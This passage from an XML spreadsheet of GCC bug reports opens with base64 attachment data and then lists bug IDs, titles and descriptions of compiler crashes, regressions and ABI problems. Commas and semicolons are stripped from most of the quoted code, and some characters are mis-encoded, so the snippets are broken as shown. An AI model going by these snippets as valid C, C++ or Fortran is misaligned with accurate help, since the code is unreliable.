 +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
 JQIA
 --iwHBbRI9kgIhsi5Q
 Content-Type: application/x-gunzip
 Content-Disposition: attachment filename=gcc-out.gz
 Content-Transfer-Encoding: base64
 H4sICM0OETkAA2djYy1vdXQAlVLfb9owEH7PX3HqXkDIMaUa69BWCVHWIWUU0XbaWxSMCZYc
 2/OPQv/7ngMZVOwBIkXn++7z+e6+m/NiKVQJznDmYGV1BdRXhpaMUSkW0ZJoRf+2T0w8q7Al
 pQq0l37t0/pagiR45dYJrSDC0Ovi97l7DS2+NdyKiitfyHZyUW5mDBBZqJKwTgfIK5D7PH+Y
 vozy/HuvcR6OnVH+azJ9nCOENfzDZsPn0c9s/HucYaBb48zI4OJfe+PsR57jKSixRVOX8SGQ
 5zG0P9bhI/gAAhm6N+d51TLaiW17l+PPaDx7njxOnzDMTGiJm9s+hoZVwdZC8ca/j7a+8eGw
 f8gHxXODUxShMlYjughlimOPRogEG4XRbHaWCtDCyeLcUY76cchi8RSbbSefhGIyLDlcpWl6
 BY4Xlq3B+cJ6B2tu+eBA+YaUu/9SDjLvubTsdMgN4sFZKjUrZBO5bCVOL50SD5z4WOON1RL0
 qqlWCufTC7eRXdcLsxs4kL9BcA9kiXosCscbPUijA</t>
  </si>
  <si>
    <t>GCC-32929</t>
  </si>
  <si>
    <t>[4.3 Regression] Make FAILURE in 4.3.0 - error: `CXX' has changed since the previous run:</t>
  </si>
  <si>
    <t>revision 127028 failed to bootstrap on Linux/x86-64:
configure: error: `CXX' has changed since the previous run:
...
It may be caused by
http://gcc.gnu.org/ml/java-patches/2007-q3/msg00022.html</t>
  </si>
  <si>
    <t>GCC-11156</t>
  </si>
  <si>
    <t>[3.4 Regression] new bootstrap failure on mips-sgi-irix6.5 stage2 libgcc2 fp-bit.c</t>
  </si>
  <si>
    <t>Sometime between June 7 and June 8 I started getting a new bootstrap failure 
on mainline for mips-sgi-irix6.5 in stage2 building libgcc2.  It looks like 
this:
fp-bit.c: In function `__pack_f':
fp-bit.c:205: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [libgcc/./_pack_sf.o] Error 1
To reproduce target mips-sgi-irix6.5 and compile fp-bit.i with:
cc1 -fpreprocessed fp-bit.i -quiet -dumpbase fp-bit.c -auxbase-strip 
libgcc/./_pack_sf.o -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -
Wmissing-prototypes -version -o fp-bit.s</t>
  </si>
  <si>
    <t>GCC-11096</t>
  </si>
  <si>
    <t>i686-linux to sh-linux cross compiler fails to compile C++ files</t>
  </si>
  <si>
    <t>This is the same as bug 3774 but for SH instead of arm.
Compiling a 'hello world' c++ program spews errors of the sort
.../g++-v3/bits/std_cstdio.h:145: `vfscanf' not declared
unless -D_ISOC9X_SOURCE is passed to the compiler.
The fix for arm appears to have been
http://gcc.gnu.org/cgi-bin/cvsweb.cgi/gcc/gcc/config/arm/linux-elf.h.diff?r1=1.31&amp;r2=1.32
which predefines _GNU_SOURCE with the comment
/* The GNU C++ standard library currently requires _GNU_SOURCE *
Looks like other architectures might need this too.  I'm attaching a patch
for sh4.  No idea if it's actually right yet but it seems logical.</t>
  </si>
  <si>
    <t>GCC-190</t>
  </si>
  <si>
    <t>Optimization bug for x86 target</t>
  </si>
  <si>
    <t xml:space="preserve"> Original-Message-ID: 
 Date: Wed 03 May 2000 02:46:09 +1000
 gcc 2.95.2 intel self-compiled system also reproduced on a debian
 system.
 Compile the attached preprocessed source with no options and everything
 works fine.  Compile it with -O and it gives an interal compiler
 error.  I haven't gotten around to narrowing it down to any particular
 kind of optimisation.
 Mick.
[Neil:]This is what it gives on my system so it appears to be a backend bug:
yuv2rgb.c: In function `yuv2rgb_mmx_32':
yuv2rgb.c:293: Internal compiler error in print_operand_address at config/i386/i386.c:3550
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.
bash-2.04$
Release:
2.95.2</t>
  </si>
  <si>
    <t>GCC-14071</t>
  </si>
  <si>
    <t>locale::global doesn't always call setlocale</t>
  </si>
  <si>
    <t>locale::global(loc) should call setlocale(LC_ALL loc.name().c_str()) if 
loc is a named locale but it fails to do so if loc is the result of
combining two named locales with the constructor
locale(const locale&amp; const locale&amp; locale::category).</t>
  </si>
  <si>
    <t>GCC-6393</t>
  </si>
  <si>
    <t>alignment problems with jlong and inner class inheritance</t>
  </si>
  <si>
    <t>The program below prints out
0 rather than 3. Closer inspection reveals that foo() is looking
at a memory location four bytes less than wher y is. This behavior
occurs on both Win32 and Linux.
[[see how-to-repeat]]
Release:
unknown
Environment:
GCJ-Linux GCJ-PowerPC GCJ-Win32
How-To-Repeat:
cat &gt; test.java &lt;&lt;\EOF
abstract class sup {
    long a
    boolean b
    public sup() { }
}
public class test {
    public static void main(String[] s) { new inner() }
    static class inner extends sup {
        int y = 3
        native void foo()
        inner() { foo() }
    }
}
EOF
cat &gt; test.cc &lt;&lt;\EOF
#include test$inner.h
#include java/lang/System.h
#include java/io/PrintStream.h
void test$inner::foo() {
    java::lang::System::out-&gt;println(y)
}
EOF
jikes test.java
gcjh test\$inner
gcjh sup
CLASSPATH= gcj -I. test.cc test.java -fno-rtti --main=test
./a.out</t>
  </si>
  <si>
    <t>GCC-78811</t>
  </si>
  <si>
    <t>[7 Regression] raw-string-6.c testsuite failure</t>
  </si>
  <si>
    <t>c-c++-common/raw-string-6.c:5:18: error: unterminated raw string
c-c++-common/raw-string-6.c:5:1: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>GCC-15915</t>
  </si>
  <si>
    <t>Illegal program not detected RM 13.11(15)</t>
  </si>
  <si>
    <t>-- RM 13.11(15)
-- the name in a Storage_Pool clause shall denote a variable
with System.Storage_Pools
with System.Storage_Elements
package Test_247560 is
   type Storage_Pool_Type
   is new System.Storage_Pools.Root_Storage_Pool with null record
   procedure Allocate
      (Pool                     : in out Storage_Pool_Type
       Storage_Address          :    out System.Address
       Size_In_Storage_Elements : in     System.Storage_Elements.Storage_Count
       Alignment                : in     System.Storage_Elements.Storage_Count)
   procedure Deallocate
      (Pool                     : in out Storage_Pool_Type
       Storage_Address          : in     System.Address
       Size_In_Storage_Elements : in     System.Storage_Elements.Storage_Count
       Alignment                : in     System.Storage_Elements.Storage_Count)
   function Storage_Size
      (Pool : in Storage_Pool_Type)
          return System.Storage_Elements.Storage_Count
   x1: Storage_Pool_Type
   type T1 is access integer
   for T1'Storage_Pool use (x1)  -- ERROR:
                                  -- parenthesised expression not variable
end Test_247560
I expect an error message like this:
test_247560.ads:27:27: variable expected found expression
But the compiler remains silent.  To be more precise it says:
cannot generate code for file test_247560.ads (package spec)
to check package spec for errors use -gnatc
gnatmake: test_247560.ads compilation error
which is unrelated to the bug.  Also:
$ gcc-3.4 -c -gnatc test_247560.ads
yields nothing.</t>
  </si>
  <si>
    <t>GCC-24683</t>
  </si>
  <si>
    <t>[3.4/4.0/4.1 Regression] ICE in in extract_insn at recog.c:2084</t>
  </si>
  <si>
    <t>Compiling kdenetwork3 we get
/abuild/buildsystem.f198.rguenther/usr/lib64/gcc/x86_64-suse-linux/4.1.0/cc1plus -fpreprocessed hash.3.1.ii -quiet -dumpbase hash.cpp -mtune=k8 -ansi -auxbase-strip .libs/libiris_xmpp_core_la-hash.o -O2 -O2 -Wno-long-long -Wundef -Wcast-align -Wconversion -Wchar-subscripts -Wall -W -Wpointer-arith -Wall -Wformat-security -Wmissing-format-attribute -Wno-non-virtual-dtor -ansi -version -fmessage-length=0 -fno-exceptions -fno-check-new -fno-common -fvisibility=hidden -fPIC -o hash.s
hash.3.1.ii:38: error: unrecognizable insn:                                                (insn:HI 58 57 53 0 (set (reg/f:DI 69)                                                             (plus:DI (reg/f:DI 70)                                                                         (const_int 4294967233 [0xffffffc1]))) -1 (insn_list:REG_DEP_TRUE 57 (nil))         (expr_list:REG_DEAD (reg/f:DI 70)                                                              (expr_list:REG_EQUAL (const:DI (plus:DI (symbol_ref/f:DI (*.LC0) [flags 0x2] )                                                                                         (const_int 4294967233 [0xffffffc1])))                                              (nil))))                                                                       hash.3.1.ii:38: internal compiler error: in extract_insn at recog.c:2084                  Please submit a full bug report                                                           with preprocessed source if appropriate.                                                   See  for instructions.</t>
  </si>
  <si>
    <t>GCC-47260</t>
  </si>
  <si>
    <t>DLLEXPORT: TREE_PUBLIC for procedures lost between trans-decl.c and tree.c</t>
  </si>
  <si>
    <t>With the following mingw gfortran package:
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=c:/program files/gfortran/bin/../libexec/gcc/i586-pc-mingw32
/4.6.0/lto-wrapper.exe
Target: i586-pc-mingw32
Configured with: ../gcc-trunk/configure --prefix=/mingw --enable-languages=cfor
tran --with-gmp=/home/brad/gfortran/dependencies --disable-werror --enable-threa
ds --disable-nls --build=i586-pc-mingw32 --enable-libgomp --disable-shared --dis
able-win32-registry --with-dwarf2 --disable-sjlj-exceptions --enable-lto
Thread model: win32
gcc version 4.6.0 20101201 (experimental) [trunk revision 167359] (GCC)
If I build a standalone function declared as:
INTEGER FUNCTION test()
!GCC$ ATTRIBUTES STDCALL DLLEXPORT :: test
test = 1
END FUNCTION test
and build it with:
gfortran -std=f2008 -march=native -c bug.f90
The result is:
bug.f90:1:0: error: external linkage required for symbol 'test' because of 'dlle
xport' attribute
I believe that either something is not being set correctly for symbol 'test' or an additional attribute needs to be made available so that 'test' can be marked correctly.  In the absence of this the manual should clearly state that dllexport cannot be applied to procedures in Windows.</t>
  </si>
  <si>
    <t>GCC-80</t>
  </si>
  <si>
    <t>g++ enum and attributed __packed__</t>
  </si>
  <si>
    <t xml:space="preserve"> Original-Message-ID: 
 Date: Mon 17 Jan 2000 11:34:55 +0100
 Hello
 I run into some very essential problem with g++:
 The g++ Compiler does not support the attribute (packed) on enum
 declarations.
 The following line of code compiles with gcc but not with g++:
 enum numbers { zero one two three } __attribute__ ((packed)) 
 The documentation says:
 packed 
     This attribute attached to an enum struct or union type
   definition specified that the minimum required memory be used to
   represent the type. Specifying this attribute for struct and union
   types is equivalent to specifying the packed attribute on each of
   the structure or union members.  Specifying the `-fshort-enums'
   flag on the line is equivalent to specifying the packed attribute
   on all enum definitions.  You may only specify this attribute after
   a closing curly brace on an enum definition not in a typedef
   declaration unless that declaration also contains the definition
   of the enum.
 The command g++ -v --save-temps enum.C returns:
 Reading specs from /usr/lib/gcc-lib/i486-linux/egcs-2.91.66/specs
 gcc version egcs-2.91.66 19990314 (egcs-1.1.2 release)
  /usr/lib/gcc-lib/i486-linux/egcs-2.91.66/cpp -lang-c++ -v -undef
 -D__GNUC__=2 -D__GNUG__=2 -D__cplusplus -D__GNUC_MINOR__=91 -D__ELF__
 -Dunix -Di386 -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__
 -D__i386__ -D__linux__ -D__unix -D__i386 -D__linux -Asystem(posix)
 -D__EXCEPTIONS -Asystem(unix) -Acpu(i386) -Amachine(i386) -Di386
 -D__i386 -D__i386__ -Di486 -D__i486 -D__i486__ enum.C enum.ii
 GNU CPP version egcs-2.91.66 19990314 (egcs-1.1.2 release) (i386
 Linux/ELF)
 #include ... search starts here:
 #include  search starts here:
  /usr/include/g++
  /usr/lib/g++-include
  /usr/local/include
  /usr/i486-linux/include
  /usr/lib/gcc-lib/i486-linux/egcs-2.91.66/include
  /usr/include
 End of search list.
  /usr/lib/gcc-lib/i486-linux/egcs-2.91.66/cc1plus enum.ii -quiet
 -dumpbase enum.cc -version -o enum.s
 GNU C++ version egcs-2.91.66 19990314 (egcs-1.1.2 release) (i486-linux)
 compiled by GNU C version egcs-2.91.66 19990314 (egcs-1.1.2 release).
 enum.C:4: semicolon missing after declaration of `numbers'
 The file enum.ii (6 lines):
 # 1 enum.C
 enum numbers { zero one two three } __attribute__ ((packed))  
 -- end of file --
 I found nothing about this under well known bugs
 and I hope you can fix this.
 Thanks
 Karsten Muuss
Release:
2.95.2</t>
  </si>
  <si>
    <t>GCC-66224</t>
  </si>
  <si>
    <t>PowerPC _GLIBCXX_READ_MEM_BARRIER too weak</t>
  </si>
  <si>
    <t>_GLIBCXX_READ_MEM_BARRIER should be lwsync on PowerPC for acquire barrier (fence) not isync.</t>
  </si>
  <si>
    <t>GCC-79738</t>
  </si>
  <si>
    <t>Documentation for __attribute__((const)) slightly misleading</t>
  </si>
  <si>
    <t>Looking at the description of __attribute__((const)) at: https://gcc.gnu.org/onlinedocs/gcc/Common-Function-Attributes.html#Common-Function-Attributes
Basically this is just slightly more strict class than the pure attribute below since function is not allowed to read global memory.
That's almost correct -- it's not allowed to read memory that can change.  You could argue that global implies the .data space but to a lay programmer it would suggest you can't do any memory reads except on your own stack.
To take a trivial example it's fine for this to be ((const)):
    static const int TABLE[] = { 1 2 3 }
    extern int lookup(unsigned x) __attribute__((const))
    int lookup(unsigned x)
    {
        return TABLE[x]
    }
...and if fact -Wsuggest-attribute=const will warn if you don't have the attribute there.
I suggest amending the documentation to say ...is not allowed to read from any memory location whose contents can change between calls</t>
  </si>
  <si>
    <t>m-gccbugs</t>
  </si>
  <si>
    <t>GCC-68809</t>
  </si>
  <si>
    <t>[6 Regression] ICE: verify_gimple failed (error: type mismatch in binary expression) w/ -O2 (-O3 -Ofast) -floop-nest-optimize</t>
  </si>
  <si>
    <t>1. 6.0.0-alpha20151206 for both x86_64-pc-linux-gnu and powerpc-e500v2-linux-gnuspe ICEs when compiling the following reduced snippet w/ -O2 (and above) -floop-nest-optimize:
int ae vs
char ue
void
kc(char)
void
pm(void)
{
  unsigned int v9
  int gf = 0
  vs = 1
  while (vs) {
    gf -= ue
    kc(ue)
    for (ae = 0 ae &lt; 70 ++ae) {
    }
    ae 
    ae ^ (gf != 0) 
  }
  v9 = ue + 1
  ue - v9 
}
% x86_64-pc-linux-gnu-gcc-6.0.0-alpha20151206 -c -O2 -floop-nest-optimize krqo19j8.c
krqo19j8.c: In function 'pm':
krqo19j8.c:8:1: error: type mismatch in binary expression
 pm(void)
 ^~
int
char
int
_25 = prephitmp_37 + 1
krqo19j8.c:8:1: internal compiler error: verify_gimple failed
2. A slight reorganization of expressions in this snippet demonstrates another error during GIMPLE verification which is reproducible for x86_64-pc-linux-gnu but not powerpc-e500v2-linux-gnuspe:
int ae vs gf
char ue
void
kc(char)
void
pm(void)
{
  unsigned int v9
  int td = (gf != 0)
  while (vs) {
    kc(ue)
    for (ae = 0 ae &lt; 70 ++ae) {
    }
    ae 
    ae ^ td 
    ++vs
  }
  v9 = ue + 1
  ue - v9 
}
ostkomke.c: In function 'pm':
ostkomke.c:8:1: error: incompatible types in PHI argument 0
 pm(void)
 ^~
int
char
prephitmp_47 = PHI 
ostkomke.c:8:1: internal compiler error: verify_gimple failed</t>
  </si>
  <si>
    <t>GCC-57960</t>
  </si>
  <si>
    <t>S/390: LRA ICE building glibc</t>
  </si>
  <si>
    <t>Testcase extracted from Glibc e_acosl.c:
typedef union
{
  long double value
  struct
  {
    unsigned int w0 w1 w2 w3
  }
  parts32
}
ieee854_long_double_shape_type
static const long double one = 1.0L
long double
__ieee754_acosl (long double x)
{
  long double z w
  int ix
  ieee854_long_double_shape_type u
      z = (one - u.value) * 0.5
      u.parts32.w2 = 0
      u.parts32.w3 = 0
      w = z - u.value * u.value
      return 2.0 * w
}
builds fine with: cc1 -fpreprocessed  -quiet  -O1 -mno-lra
but with: cc1 -fpreprocessed  -quiet  -O1
t.c: In function â€˜__ieee754_acoslâ€™:
t.c:25:1: error: unable to generate reloads for:
 }
 ^
(insn 14 13 16 2 (set (strict_low_part (subreg:SI (reg/v:TI 51 [ u ]) 12))
        (const_int 0 [0])) t.c:21 77 {movstrictsi}
     (nil))
t.c:25:1: internal compiler error: in curr_insn_transform at lra-constraints.c:2954
0x8051ecb5 _fatal_insn(char const* rtx_def const* char const* int char const*)
        /home/andreas/patched/gcc-head/gcc/rtl-error.c:109
0x8046895b curr_insn_transform
        /home/andreas/patched/gcc-head/gcc/lra-constraints.c:2954
0x804692e1 lra_constraints(bool)
        /home/andreas/patched/gcc-head/gcc/lra-constraints.c:3810
0x804577a9 lra(_IO_FILE*)
        /home/andreas/patched/gcc-head/gcc/lra.c:2319
0x8040c22b do_reload
        /home/andreas/patched/gcc-head/gcc/ira.c:4689
0x8040c22b rest_of_handle_reload
        /home/andreas/patched/gcc-head/gcc/ira.c:4801</t>
  </si>
  <si>
    <t>GCC-78701</t>
  </si>
  <si>
    <t>[6/7 Regression] ICE: unexpected expression N of kind template_parm_index</t>
  </si>
  <si>
    <t>The following code fails to compile on g++ 6.1 6.2 and 7 (and I guess on g++ 6.0):
======================================================================
#include 
template  T f(T x) {return T()}
int main(int argc char* argv[]) {return f(42)}
======================================================================
It returns the following error:
======================================================================
test_bug.cpp: In function â€˜int main(int char**)â€™:
test_bug.cpp:3:46: error: no matching function for call to â€˜f(int)â€™
 int main(int argc char* argv[]) {return f(42)}
                                              ^
test_bug.cpp:2:49: note: candidate: template T f(T)
 template  T f(T x) {return T()}
                                                 ^
test_bug.cpp:2:49: note:   template argument deduction/substitution failed:
test_bug.cpp:2:42: error: invalid use of template type parameter â€˜Tâ€™
 template  T f(T x) {return T()}
                                        ~~^~~
test_bug.cpp:2:44: error: could not convert template argument â€˜â€™ to â€˜boolâ€™
 template  T f(T x) {return T()}
                                            ^
======================================================================</t>
  </si>
  <si>
    <t>GCC-13114</t>
  </si>
  <si>
    <t>The testcase failed on both g++ 3.3 and 3.2.2 versions on linuxppc machine. 
Here is the testcase:
struct W { }
struct X : public W { }
struct Y : public W { }
struct Z : virtual public X public Y { }
struct ZZ : public Z {
    int i
    int func() { return 0}
}
int main(void) {
    ZZ zz
    return 0
}
using g++ -fdump_class_hierarchy t.C with/without option -fabi-version=2 ( what 
this option means? I could not find this 2 meaning in option description.)
we got two different class hierarchy. But both are incorrect. Here is the class 
layout of ZZ without -fabi-version=2 option ( the default should be -fabi-
version=0):
Class ZZ
   size=8 align=4
ZZ (0x40983b00) 0
    vptridx=0 vptr=((&amp;ZZ::_ZTV2ZZ) + 12)
  Z (0x40983b40) 0 nearly-empty
      primary-for ZZ (0x40983b00)
      subvttidx=4
    X (0x40983c00) 4 empty virtual canonical
        vbaseoffset=-12
      W (0x40983c40) 4 empty
    Y (0x40983b80) 0 empty
      W (0x40983bc0) 0 empty
This class hierarchy is wrong because the base class X shares the same offset 
with ZZ's data member int i. 
Using g++ -fabi-version=2 -fdump-class-hierarchy t.C I got a different class 
layout for ZZ:
Class ZZ
   size=12 align=4
ZZ (0x40983b00) 0
    vptridx=0 vptr=((&amp;ZZ::_ZTV2ZZ) + 12)
  Z (0x40983b40) 0 nearly-empty
      primary-for ZZ (0x40983b00)
      subvttidx=4
    X (0x40983c00) 8 empty virtual canonical
        vbaseoffset=-12
      W (0x40983c40) 12 empty
    Y (0x40983b80) 0 empty
      W (0x40983bc0) 0 empty
This time the offset of X's W is at offset 12 which is also wrong according to 
C++ ABI it should be put at the same offset with X.</t>
  </si>
  <si>
    <t>GCC-59649</t>
  </si>
  <si>
    <t>[4.9 regression] BImode miscompiled</t>
  </si>
  <si>
    <t>From ia64-suse-linux/libgomp/config.log:
configure:16188:  /usr/local/gcc/test/Build/./gcc/xgcc -B/usr/local/gcc/test/Build/./gcc/ -B/usr/ia64-suse-linux/bin/ -B/usr/ia64-suse-linux/lib/ -isystem /usr/ia64-suse-linux/include -isystem /usr/ia64-suse-linux/sys-include    -o conftest -g -O2 -include confdefs.h -include ../../../libgomp/config/linux/omp-lock.h   conftest.c -lrt  &gt;&amp;5
configure:16188: $? = 0
configure:16188: ./conftest
configure:16188: $? = 1
configure: program exited with status 1
configure: failed program was:
| /* confdefs.h */
| #define PACKAGE_NAME GNU OpenMP Runtime Library
| #define PACKAGE_TARNAME libgomp
| #define PACKAGE_VERSION 1.0
| #define PACKAGE_STRING GNU OpenMP Runtime Library 1.0
| #define PACKAGE_BUGREPORT 
| #define PACKAGE_URL http://www.gnu.org/software/libgomp/
| #define PACKAGE libgomp
| #define VERSION 1.0
| #define HAVE_SYS_TYPES_H 1
| #define HAVE_SYS_STAT_H 1
| #define HAVE_STDLIB_H 1
| #define HAVE_STRING_H 1
| #define HAVE_MEMORY_H 1
| #define HAVE_STRINGS_H 1
| #define HAVE_INTTYPES_H 1
| #define HAVE_STDINT_H 1
| #define HAVE_UNISTD_H 1
| #define HAVE_DLFCN_H 1
| #define LT_OBJDIR .libs/
| #define TIME_WITH_SYS_TIME 1
| #define STRING_WITH_STRINGS 1
| #define HAVE_UNISTD_H 1
| #define HAVE_SEMAPHORE_H 1
| #define HAVE_SYS_TIME_H 1
| #define HAVE_SYS_TIME_H 1
| #define HAVE_GETLOADAVG 1
| #define HAVE_STRTOULL 1
| #define HAVE_PTHREAD_AFFINITY_NP 1
| #define HAVE_CLOCK_GETTIME 1
| #define HAVE_TLS 1
| #define HAVE_ATTRIBUTE_VISIBILITY 1
| #define HAVE_ATTRIBUTE_ALIAS 1
| #define HAVE_AS_SYMVER_DIRECTIVE 1
| #define HAVE_SYMVER_SYMBOL_RENAMING_RUNTIME_SUPPORT 1
| #define LIBGOMP_GNU_SYMBOL_VERSIONING 1
| #define HAVE_SYNC_BUILTINS 1
| /* end confdefs.h.  */
| 
| static long int longval () { return sizeof (omp_lock_t) }
| static unsigned long int ulongval () { return sizeof (omp_lock_t) }
| #include 
| #include 
| int
| main ()
| {
| 
|   FILE *f = fopen (conftest.val w)
|   if (! f)
|     return 1
|   if ((sizeof (omp_lock_t)) &lt; 0)
|     {
|       long int i = longval ()
|       if (i != (sizeof (omp_lock_t)))
|       return 1
|       fprintf (f %ld i)
|     }
|   else
|     {
|       unsigned long int i = ulongval ()
|       if (i != (sizeof (omp_lock_t)))
|       return 1
|       fprintf (f %lu i)
|     }
|   /* Do not output a trailing newline as this causes \r\n confusion
|      on some platforms.  */
|   return ferror (f) || fclose (f) != 0
| 
|   
|   return 0
| }
configure:16191: error: unsupported system cannot find sizeof (omp_lock_t)
The test program is miscompiled to always return 1.
(gdb) disass main
Dump of assembler code for function main:
   0x4000000000000600 :     [MMB]       alloc r34=ar.pfs740
   0x4000000000000601 :                 addl r37=288r1
   0x4000000000000602 :                 nop.b 0x0
   0x4000000000000610 :    [MII]       addl r36=280r1
   0x4000000000000611 :                mov r33=b0
   0x4000000000000612 :                mov r35=r1
   0x4000000000000620 :    [MMI]       nop.m 0x0
   0x4000000000000621 :                ld8 r37=[r37]
   0x4000000000000622 :                nop.i 0x0
   0x4000000000000630 :    [MMB]       ld8 r36=[r36]
   0x4000000000000631 :                nop.m 0x0
   0x4000000000000632 :                br.call.sptk.many b0=0x4000000000000540
   0x4000000000000640 :    [MMI]       mov r1=r35
   0x4000000000000641 :                nop.m 0x0
   0x4000000000000642 :                mov r32=r8
   0x4000000000000650 :    [MII]       mov r38=4
   0x4000000000000651 :                mov r36=r8
   0x4000000000000652 :                addl r37=296r1
   0x4000000000000660 :    [MIB]       ld8 r37=[r37]
   0x4000000000000661 :                nop.i 0x0
   0x4000000000000662 :                br.call.sptk.many b0=0x40000000000005c0
   0x4000000000000670 :   [MIB]       mov r1=r35
   0x4000000000000671 :               mov r36=r32
   0x4000000000000672 :               br.call.sptk.many b0=0x4000000000000560
   0x4000000000000680 :   [MMI]       mov r8=1
   0x4000000000000681 :               mov r1=r35
   0x4000000000000682 :               mov.i ar.pfs=r34
   0x4000000000000690 :   [MIB]       nop.m 0x0
   0x4000000000000691 :               mov b0=r33
   0x4000000000000692 :               br.ret.sptk.many b0</t>
  </si>
  <si>
    <t>GCC-17615</t>
  </si>
  <si>
    <t>Internal compiler error using interface procedures</t>
  </si>
  <si>
    <t>When compiling the following source files:
------------------- vec3d.f90 --------------------------
! Operations on 3-dimensional vectors
module module_vec3d
  implicit none
! Public procedures
  private
  public :: cross_product cross_product3_R4_R8
! Module constants
  integer parameter :: SP = selected_real_kind(6)
  integer parameter :: DP = selected_real_kind(12)
  real(SP) parameter :: TINY_SP = tiny(0.0_SP)
  real(DP) parameter :: TINY_DP = tiny(0.0_DP)
! Vector cross product interface
  INTERFACE cross_product
     MODULE PROCEDURE cross_product3_R4_R8
  END INTERFACE
CONTAINS
  FUNCTION cross_product3_R4_R8 (xy) result (z)
    real(DP) :: z(3)
    real(SP) intent(in) :: x(3)
    real(DP) intent(in) :: y(3)
    z(1) = x(2) * y(3) - x(3) * y(2)
    z(2) = x(3) * y(1) - x(1) * y(3)
    z(3) = x(1) * y(2) - x(2) * y(1)
  END FUNCTION cross_product3_R4_R8
END MODULE module_vec3d
-----------------------------------------------------
